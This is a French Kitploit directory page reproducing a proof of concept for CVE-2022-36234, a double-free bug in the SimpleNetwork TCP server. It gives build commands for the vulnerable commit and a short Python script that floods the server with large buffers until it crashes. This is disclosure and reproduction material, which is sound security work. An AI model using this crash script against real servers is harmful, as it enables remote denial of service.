Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-36234 — Preuve de concept pour CVE-2022-36234 | Kitploit
Outils/GitHubGitHub/halcy0nic/cve-2022-36234
Analyse des VulnérabilitésExploitationFuzzingTests d'IntrusionApprentissage et ÉducationExploitation de Binaires
GitHubhalcy0nic/cve-2022-36234

CVE-2022-36234

Preuve de concept pour CVE-2022-36234

Voir le dépôt
21il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description de CVE-2022-36234

Le serveur TCP SimpleNetwork commit 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496 a été découvert comme contenant une vulnérabilité de double libération qui est exploitée via des paquets TCP forgés. Déclencher la double libération permettra aux clients de faire planter à distance n'importe quel serveur TCP SimpleNetwork. Dans d'autres situations, les vulnérabilités de double libération peuvent provoquer un comportement indéfini et potentiellement une exécution de code dans les bonnes circonstances.

Reproduction

Pour vous assurer que vous disposez des outils de construction standard nécessaires pour compiler la bibliothèque, installez les paquets suivants (sur la plupart des systèmes, ils seront déjà installés) :

root@kitploit:~
sudo apt-get install build-essential git

La vulnérabilité peut être reproduite en envoyant des requêtes consécutives au serveur contenant un grand tampon de caractères dans un paquet TCP. Tout d'abord, compilez la bibliothèque 'libSimpleNetwork' et le serveur d'exemple fourni dans le code source :

root@kitploit:~
git clone https://github.com/kashimAstro/SimpleNetwork.git
cd SimpleNetwork
git checkout 29bc615f0d9910eb2f59aa8dff1f54f0e3af4496
cd src
make
cd ../example-server
make

Démarrer le serveur d'exemple :

root@kitploit:~
./server 80 1

Enregistrez le script de preuve de concept python3 suivant dans un fichier (modifiez l'hôte si nécessaire) :

Télécharger l’outil
root@kitploit:~
import socket

host = "localhost"
port = 80                   # The same port as used by the server
buf = b'A'*10000

try:
    for i in range(50):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(buf)
        data = s.recv(1024)
        s.close()
        print('Received', repr(data))
except:
    print("Completed...")

Exécutez le script python3 :

root@kitploit:~
python3 poc.py

Vérification du crash :

Si la manipulation réussit, le serveur plantera et vous verrez la sortie suivante de l'application :

root@kitploit:~
segmentation fault  ./server 80 1

Références

  • https://owasp.org/www-community/vulnerabilities/Doubly_freeing_memory
  • https://cwe.mitre.org/data/definitions/415.html
  • https://github.com/kashimAstro/SimpleNetwork/issues/22
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36234